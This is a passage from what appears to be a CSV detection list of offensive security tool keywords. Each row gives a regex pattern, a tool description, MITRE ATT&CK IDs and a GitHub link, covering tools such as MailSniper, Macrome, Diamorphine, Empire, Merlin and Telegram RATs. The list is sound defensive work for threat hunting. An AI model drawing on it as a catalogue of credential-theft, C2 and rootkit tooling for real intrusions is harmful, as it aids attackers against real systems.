T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mac2john.py*",".{0,1000}mac2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mac2john-alt.py*",".{0,1000}mac2john\-alt\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*MaccaroniC2.git*",".{0,1000}MaccaroniC2\.git.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*macchanger -r*",".{0,1000}macchanger\s\-r.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*MaceTrap.exe*",".{0,1000}MaceTrap\.exe.{0,1000}","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*machine1337/TelegramRAT*",".{0,1000}machine1337\/TelegramRAT.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*macro_pack*",".{0,1000}macro_pack.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1566.001 - T1564.001 - T1564.003","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","2042","398","2022-05-12T13:30:29Z","2017-10-03T18:30:06Z" "*MacroDetectSandbox.vbs*",".{0,1000}MacroDetectSandbox\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*MacroExploit.txt*",".{0,1000}MacroExploit\.txt.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*Macrome *--decoy-document*",".{0,1000}Macrome\s.{0,1000}\-\-decoy\-document.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome *--payload*",".{0,1000}Macrome\s.{0,1000}\-\-payload.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome build*",".{0,1000}Macrome\sbuild.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.csproj*",".{0,1000}Macrome\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.dll*",".{0,1000}Macrome\.dll.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.sln*",".{0,1000}Macrome\.sln.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*MACshellcode.cpp*",".{0,1000}MACshellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*MACshellcode.exe*",".{0,1000}MACshellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*MACshellcode.sln*",".{0,1000}MACshellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*MACshellcode.vcxproj*",".{0,1000}MACshellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*Made by: @Trevohack | @opabravo | @matheuz*",".{0,1000}Made\sby\:\s\@Trevohack\s\|\s\@opabravo\s\|\s\@matheuz.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*MAGENT=merlinAgent*",".{0,1000}MAGENT\=merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*MAGIC_PREFIX ""diamorphine_secret*",".{0,1000}MAGIC_PREFIX\s\""diamorphine_secret.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*magicRasMan*",".{0,1000}magicRasMan.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*Magnitude Exploit Kit*",".{0,1000}Magnitude\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*mail-in-the-middle.py*",".{0,1000}mail\-in\-the\-middle\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*mailpv.exe*",".{0,1000}mailpv\.exe.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*mailpv.zip*",".{0,1000}mailpv\.zip.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*MailSniper*",".{0,1000}MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*MailSniper.ps1*",".{0,1000}MailSniper\.ps1.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*main/gcr.py*",".{0,1000}main\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*main_air_service-probes.go*",".{0,1000}main_air_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*main_pro_service-probes.go*",".{0,1000}main_pro_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*make image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*make image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*make onionpipe*",".{0,1000}make\sonionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*make proxychains quiet*",".{0,1000}make\sproxychains\squiet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*make shared dir for kidlogger ini files*",".{0,1000}make\sshared\sdir\sfor\skidlogger\sini\sfiles.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*make_avet -l *.exe *",".{0,1000}make_avet\s\-l\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*make_avetsvc *",".{0,1000}make_avetsvc\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*make_kernel_shellcode*",".{0,1000}make_kernel_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_kernel_user_payload*",".{0,1000}make_kernel_user_payload.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_anonymous_login_packet*",".{0,1000}make_smb1_anonymous_login_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_echo_packet*",".{0,1000}make_smb1_echo_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_free_hole_session_packet*",".{0,1000}make_smb1_free_hole_session_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 